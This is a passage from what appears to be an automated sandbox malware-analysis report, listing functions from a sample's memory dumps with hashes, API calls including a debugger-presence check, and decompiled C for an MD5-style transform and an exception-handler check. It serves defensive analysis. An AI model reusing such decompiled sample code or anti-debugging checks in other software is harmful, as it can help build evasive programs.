Instruction Fuzzy Hash: 50E04866754305B6E700D791CD0AF7D72BCA700706F5000C4F701E61C0D6B49E14AB29

Uniqueness

Uniqueness Score: -1.00%

Function 70299DD7, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,70299DD6,702C0004,00000000,?,702C0004,?,7029C932), ref: 70299DF9
TerminateProcess.KERNEL32(00000000,?,70299DD6,702C0004,00000000,?,702C0004,?,7029C932), ref: 70299E00
ExitProcess.KERNEL32 ref: 70299E12

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b459df95236f958897edad7cd207fd0c55822d4872a46eda19de5c98441c2fd0
Instruction ID: e0386a505ecb712757ec34e42239afb6f5109515c10a66977c9a51aefa69e3b5
Opcode Fuzzy Hash: b459df95236f958897edad7cd207fd0c55822d4872a46eda19de5c98441c2fd0
Instruction Fuzzy Hash: 45E09273410208AFCF12AF6AC959B5E3B69FB44761F204415FD4A96130CA36EDA2DA84

Uniqueness

Uniqueness Score: -1.00%

Function 702A7120, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3164d18365c9cc02fc8c42a8b13686f2a0b6139bbc0f02c0930cd9bbd3f41965
Instruction ID: c8739ab25d65b260e15a7b2e502c1bb35d03b437565179190967154b6e510db5
Opcode Fuzzy Hash: 3164d18365c9cc02fc8c42a8b13686f2a0b6139bbc0f02c0930cd9bbd3f41965
Instruction Fuzzy Hash: 42F14FB2E0121A9FDF15DFA8C88069EBBB5FF88314F158169E819A7344DB30AD11CF94

Uniqueness

Uniqueness Score: -1.00%

Function 7029FAB7, Relevance: 3.1, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(702B3DA0,702910AD,?,70298F76,?,702ADD40,00012012,?,00000240,702910AD,?,0000454A,702B3DA0,?,00000000,00000480), ref: 7029FA40
OutputDebugStringW.KERNEL32(00000044,?,70298F76,?,702ADD40,00012012,?,00000240,702910AD,?,0000454A,702B3DA0,?,00000000,00000480), ref: 7029FA57

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: DebugDebuggerOutputPresentString
String ID:
API String ID: 4086329628-0
Opcode ID: cdcc8eb5f0ad839700c12adf090bef2dbfc68b5d8c8f9ba960068d2e3e57758f
Instruction ID: 50d62ee9ff14f0442547639acc9bd3e39c9c94dd94777e86c234a836fb7e4b21
Opcode Fuzzy Hash: cdcc8eb5f0ad839700c12adf090bef2dbfc68b5d8c8f9ba960068d2e3e57758f
Instruction Fuzzy Hash: D301F73303021AAEDBD15E914C46F5E3B1D9F01255F210401FD1EF6100CA25EC31A57D

Uniqueness

Uniqueness Score: -1.00%

Function 702A75B8, Relevance: 3.0, APIs: 1, Instructions: 1451COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 702A7733

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: fb1e92c174c838e87018e9c875006258e2810467f591a77e1c3030087168bd18
Instruction ID: 12c9bee75de45ff68ee8ac1340f43e5b66a7654b20e6889459940721a7c9d437
Opcode Fuzzy Hash: fb1e92c174c838e87018e9c875006258e2810467f591a77e1c3030087168bd18
Instruction Fuzzy Hash: E0C250B2E146298FDB25DE28CD407DDB7B9EB44314F1041EAD84EE7240EB78AE918F40

Uniqueness

Uniqueness Score: -1.00%

Function 702AA29E, Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

u*p, xrefs: 702AA2A5
u*p, xrefs: 702AA304

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID: u*p$u*p
API String ID: 0-1932321899
Opcode ID: e5a3d35e019e469b8abb6479994b339e288562e4fe2b487a8719f437532a1425
Instruction ID: 6b0836e658c1b21ad30e3f21ff3fc555fba3fe6b98c6324f9a0a84a09b261c2a
Opcode Fuzzy Hash: e5a3d35e019e469b8abb6479994b339e288562e4fe2b487a8719f437532a1425
Instruction Fuzzy Hash: 8711A763F30C255B675C81698C1726EA1D2DBD824031F433AD826E7284E994DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 00DC28E9, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00DC28E9(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x00dc28ec
0x00dc28f7
0x00dc28fa
0x00dc28fd
0x00dc28fe
0x00dc28fe
0x00dc2909
0x00dc291a
0x00dc291c
0x00dc291f
0x00dc291f
0x00dc2922
0x00dc2922
0x00dc2925
0x00dc2925
0x00dc2928
0x00dc2928
0x00dc2945
0x00dc2948
0x00dc295e
0x00dc2961
0x00dc297b
0x00dc297e
0x00dc2994
0x00dc2997
0x00dc2999
0x00dc29b1
0x00dc29b4
0x00dc29b7
0x00dc29cf
0x00dc29d2
0x00dc29ec
0x00dc29ef
0x00dc2a05
0x00dc2a08
0x00dc2a0a
0x00dc2a22
0x00dc2a27
0x00dc2a2a
0x00dc2a40
0x00dc2a43
0x00dc2a5d
0x00dc2a60
0x00dc2a76
0x00dc2a79
0x00dc2a7b
0x00dc2a96
0x00dc2a99
0x00dc2ab0
0x00dc2ab3
0x00dc2ab7
0x00dc2ad0
0x00dc2ad3
0x00dc2ad5
0x00dc2ad8
0x00dc2af3
0x00dc2af6
0x00dc2b0f
0x00dc2b12
0x00dc2b22
0x00dc2b25
0x00dc2b3d
0x00dc2b40
0x00dc2b5a
0x00dc2b5d
0x00dc2b75
0x00dc2b78
0x00dc2b8e
0x00dc2b91
0x00dc2ba9
0x00dc2bac
0x00dc2bc4
0x00dc2bc7
0x00dc2be1
0x00dc2be4
0x00dc2bfa
0x00dc2bfd
0x00dc2c15
0x00dc2c18
0x00dc2c32
0x00dc2c35
0x00dc2c4d
0x00dc2c50
0x00dc2c66
0x00dc2c69
0x00dc2c81
0x00dc2c84
0x00dc2c9c
0x00dc2c9f
0x00dc2cb1
0x00dc2cb4
0x00dc2cc6
0x00dc2cc9
0x00dc2cdb
0x00dc2cde
0x00dc2ce2
0x00dc2cf2
0x00dc2cf5
0x00dc2d03
0x00dc2d06
0x00dc2d18
0x00dc2d1b
0x00dc2d2f
0x00dc2d32
0x00dc2d34
0x00dc2d44
0x00dc2d47
0x00dc2d59
0x00dc2d5c
0x00dc2d6a
0x00dc2d6d
0x00dc2d7f
0x00dc2d82
0x00dc2d86
0x00dc2d96
0x00dc2d99
0x00dc2dab
0x00dc2dae
0x00dc2dbc
0x00dc2dbf
0x00dc2dd1
0x00dc2dd4
0x00dc2de6
0x00dc2de9
0x00dc2dfd
0x00dc2e00
0x00dc2e14
0x00dc2e17
0x00dc2e2b
0x00dc2e2e
0x00dc2e42
0x00dc2e45
0x00dc2e59
0x00dc2e5c
0x00dc2e70
0x00dc2e75
0x00dc2e87
0x00dc2e8a
0x00dc2e9e
0x00dc2ea1
0x00dc2eb5
0x00dc2eb8
0x00dc2ece
0x00dc2ed1
0x00dc2ee5
0x00dc2ee8
0x00dc2efa
0x00dc2efd
0x00dc2f11
0x00dc2f14
0x00dc2f28
0x00dc2f2b
0x00dc2f3f
0x00dc2f48
0x00dc2f4b
0x00dc2f54
0x00dc2f5d
0x00dc2f65
0x00dc2f6d
0x00dc2f77
0x00dc2f8c

APIs

memset.NTDLL ref: 00DC2F80

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
Instruction ID: 26ac845b9b60424e718f4eaa9eea75f3a0d278d3665ccec23048c4dd5fa3c16b
Opcode Fuzzy Hash: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
Instruction Fuzzy Hash: 7122847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 702AB7DF, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,702AB7DA,?,?,00000008,?,?,702AB472,00000000), ref: 702ABA0C

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 2067085422609dea880da1f8bda7d97184be07821d7d788fa3059a466c7774dc
Instruction ID: 3e9ce8427245c29aafc3da57edb00884b57f6bdcab359180f5f8029c6ff381a4
Opcode Fuzzy Hash: 2067085422609dea880da1f8bda7d97184be07821d7d788fa3059a466c7774dc
Instruction Fuzzy Hash: DEB13A7261060ADFD706CF28C486B597BB4FF05364F25865CE99ACF2A2C735E9A1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00DCB159, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DCB159(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xdcd290; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xdcd2d8 = 1;
										__eflags =  *0xdcd2d8;
										if( *0xdcd2d8 != 0) {
											goto L60;
										}
										_t84 =  *0xdcd290; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xdcd2d8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xdcd290 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xdcd298 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xdcd294 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xdcd298 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xdcd298 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xdcd2d8 = 1;
							__eflags =  *0xdcd2d8;
							if( *0xdcd2d8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xdcd298 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xdcd298 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xdcd2d8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xdcd298 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xdcd290 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xdcd298 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xdcd298 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00dcb163
0x00dcb166
0x00dcb16c
0x00dcb18a
0x00000000
0x00dcb18a
0x00dcb174
0x00dcb17d
0x00dcb183
0x00dcb192
0x00dcb195
0x00dcb198
0x00dcb1a2
0x00dcb1a2
0x00dcb1a4
0x00dcb1a7
0x00dcb1a9
0x00dcb1a9
0x00dcb1ab
0x00dcb1ae
0x00000000
0x00000000
0x00dcb1b0
0x00dcb1b2
0x00dcb218
0x00dcb218
0x00dcb376
0x00000000
0x00dcb376
0x00dcb1b4
0x00dcb1b4
0x00dcb1b8
0x00dcb1ba
0x00dcb1ba
0x00dcb1ba
0x00dcb1ba
0x00dcb1bd
0x00dcb1be
0x00dcb1c1
0x00dcb1c1
0x00dcb1c5
0x00dcb1c9
0x00dcb1d7
0x00dcb1d7
0x00dcb1df
0x00dcb1e5
0x00dcb1e7
0x00dcb1e9
0x00dcb1f9
0x00dcb206
0x00dcb20a
0x00dcb20f
0x00dcb211
0x00dcb28f
0x00dcb28f
0x00dcb213
0x00dcb213
0x00dcb213
0x00dcb291
0x00dcb293
0x00dcb374
0x00dcb374
0x00000000
0x00dcb299
0x00dcb299
0x00dcb2a0
0x00000000
0x00000000
